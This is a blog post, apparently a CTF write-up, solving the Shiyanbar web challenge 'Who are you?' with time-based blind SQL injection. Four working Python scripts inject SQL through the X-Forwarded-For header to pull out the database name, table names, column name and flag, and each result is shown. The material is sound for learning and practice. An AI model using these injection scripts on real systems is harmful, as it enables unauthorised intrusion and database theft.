实验吧 WEB Who are you?

最新推荐文章于 2020-03-04 17:43:24 发布

dr0s3

最新推荐文章于 2020-03-04 17:43:24 发布

阅读量968

点赞数

分类专栏：其他文章标签：实验吧 WEB Who are you?

本文链接：https://blog.csdn.net/qq1045553189/article/details/87299633

版权

其他专栏收录该内容

16 篇文章 0 订阅

订阅专栏

知识点

时间盲注

解题步骤

爆出当前使用的数据库名：

#-*-coding:utf-8-*-
import requests
import string
url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"
guess = string.ascii_lowercase+string.ascii_uppercase+string.digits+string.punctuation


print('start.')

database_name =''
for i in range(1,100):
    flag = 0
    for str in guess:
        headers = {
            "X-Forwarded-For":"127.0.0.1'+"+"(select case when (substring((select schema_name from information_schema.SCHEMATA where schema_name = database()) from %d for 1)='%s') then sleep(8) else 1 end) and '1'='1"%(i,str)
        }
        print(headers)
        try:
            res=requests.get(url,headers=headers,timeout=7)
        except:
            database_name+=str
            flag = 1
            print('database.',database_name)
            break
    if flag==0:
        break


print(database_name)

运行结果：

web4

爆出web4中的表名：

#-*-coding:utf-8-*-
import requests
import string
url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"
guess = string.ascii_lowercase+string.digits+string.punctuation+string.ascii_uppercase


print('start.')

tables =''
for i in range(1,100):
    flag = 0
    for str in guess:
        headers = {
            "X-Forwarded-For":"127.0.0.1'+"+"(select case when (substring((select group_concat(table_name separator '@') from information_schema.tables where table_schema = 'web4') from %d for 1)='%s') then sleep(8) else 1 end) and '1'='1"%(i,str)
        }
        print(headers)
        try:
            res=requests.get(url,headers=headers,timeout=7)
        except:
            tables+=str
            flag = 1
            print('tables',tables)
            break
    if flag == 0 :
        break;

print(tables)

运行结果：

client_ip@flag

爆出flag表中的列名：

#-*-coding:utf-8-*-
import requests
import string
url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"
guess = string.ascii_lowercase+string.digits+string.punctuation+string.ascii_uppercase


print('start.')

columns =''
for i in range(1,100):
    flag = 0
    for str in guess:
        headers = {
            "X-Forwarded-For":"127.0.0.1'+"+"(select case when (substring((select group_concat(column_name separator '@') from information_schema.columns where table_name = 'flag') from %d for 1)='%s') then sleep(8) else 1 end) and '1'='1"%(i,str)
        }
        print(headers)
        try:
            res=requests.get(url,headers=headers,timeout=7)
        except:
            columns+=str
            flag = 1
            print('columns',columns)
            break
    if flag == 0 :
        print('finished.')
        break;

print(columns)

运行结果：

flag

爆出flag：

#-*-coding:utf-8-*-
import requests
import string
url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"
guess = string.ascii_lowercase+string.digits+string.punctuation+string.ascii_uppercase


print('start.')

f =''
for i in range(1,100):
    flag = 0
    for str in guess:
        headers = {
            "X-Forwarded-For":"127.0.0.1'+"+"(select case when (substring((select flag from flag) from %d for 1)='%s') then sleep(8) else 1 end) and '1'='1"%(i,str)
        }
        print(headers)
        try:
            res=requests.get(url,headers=headers,timeout=7)
        except:
            f+=str
            flag = 1
            print(f)
            break
    if flag == 0 :
        print('finished.')
        break;

print(f)